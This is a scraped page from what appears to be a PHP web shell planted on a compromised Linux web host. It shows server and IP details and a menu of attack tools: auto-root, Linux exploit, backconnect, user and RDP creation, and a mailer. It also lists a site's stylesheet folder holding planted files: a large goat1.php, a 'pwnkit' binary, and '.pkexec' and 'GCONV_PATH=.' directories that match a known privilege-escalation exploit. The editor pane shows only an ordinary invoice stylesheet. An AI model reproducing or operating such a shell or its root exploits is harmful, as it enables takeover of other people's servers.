Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.138
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
resources /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
avatar.scss
193
B
-rw-r--r--
btn.scss
2.31
KB
-rw-r--r--
cards.scss
586
B
-rw-r--r--
client.scss
385
B
-rw-r--r--
colors.scss
1.85
KB
-rw-r--r--
create-invoice.scss
3.68
KB
-rw-r--r--
custom.scss
19.1
KB
-rw-r--r--
custom_theme.scss
0
B
-rw-r--r--
dark-theme.scss
11.35
KB
-rw-r--r--
dashboard.scss
1.01
KB
-rw-r--r--
filter.scss
1.57
KB
-rw-r--r--
form.scss
4.78
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
invoice.scss
3.52
KB
-rw-r--r--
labels.scss
98
B
-rw-r--r--
login.scss
1.78
KB
-rw-r--r--
main.scss
2.04
KB
-rw-r--r--
messages.scss
3.8
KB
-rw-r--r--
modal.scss
333
B
-rw-r--r--
pagination.scss
705
B
-rw-r--r--
project.scss
6.3
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
recruit.scss
1.34
KB
-rw-r--r--
rtl.scss
12.77
KB
-rw-r--r--
settings.scss
5.99
KB
-rw-r--r--
sidebar.scss
8.08
KB
-rw-r--r--
style.scss
921
B
-rw-r--r--
tables.scss
1.7
KB
-rw-r--r--
task-board.scss
2.04
KB
-rw-r--r--
task_list.scss
3.25
KB
-rw-r--r--
ticket.scss
3.33
KB
-rw-r--r--
typography.scss
1.1
KB
-rw-r--r--
ui_inventory.scss
2.51
KB
-rw-r--r--
variables.scss
551
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : invoice.scss
.invoice{ .inv-num-date td{ padding: 6px; border: 1px solid #DBDBDB; } .inv-detail, .inv-desc-mob { .i-d-heading{ border: 1px solid #DBDBDB; td{ border: 1px solid #DBDBDB; } } td, th{ padding: 11px 10px; border: 1px solid #e7e9eb; word-break: break-word; } } .card-footer { button{ padding: 0px 30px; @include media-breakpoint-down(sm){ padding: 9px 22px; } } .inv-action{ .dropdown-toggle{ font-size: 15px; color: #616e80; border: solid 1px #616e80; padding: 0px 9px; border-radius: 4px; height: 36px; display: inline-flex; justify-content: center; align-items: center; line-height: 0; &:hover{ background-color: black; color: #fff !important; span .fa-chevron-down{ color: #fff !important; } } span{ border-left: 1px solid #99a5b5; height: 34px; display: inline-flex; padding-left: 8px; align-items: center; margin-left: 8px; @include media-breakpoint-down(sm){ margin-left: 30px; } } } } } } .unpaid{ text-transform: uppercase; background-color: $white; color: $red; border: 1px solid $red; position: relative; padding: 11px 22px; // &:hover{ // background-color: darken($color: $white, $amount: 100%); // border: 1px solid black !important; // color: #fff; // } } .inv-desc, .inv-note{ width: 100%; } .inv-note td{ width: 50%; word-break: break-word; } .inv-unpaid td:nth-child(2){ text-align: right; @include media-breakpoint-down(sm){ text-align: left; } } @include media-breakpoint-down(sm){ .inv-logo-heading img{ width: auto; } .inv-logo-heading td{ width: 100%; display: block; margin: 0 auto; text-align: center; } .inv-num-date{ width: 100%; td{ display: table-cell !important; text-align: left !important; } } .inv-num td{ display: block; margin: 0 auto; text-align: center; } .blank-td{ display: none; } .inv-note td, .inv-unpaid td{ width: 100%; display: block; } .inv-detail { margin-bottom: 5px; } .inv-desc::-webkit-scrollbar { width: 5px; background: $white ; height: 10px; } .inv-desc::-webkit-scrollbar-thumb { border-radius: 7px; background-color: $grey ; } } .invoice .card-footer{ display: flex; flex-flow: row; justify-content: flex-end; @include media-breakpoint-down(sm){ flex-flow: column; .btn-primary, .inv-action{ width: 50%; } .btn-primary{ margin-right: 0px !important; } .inv-action button{ width: 100%; } .btn-cancel{ order: 3; } } }
Close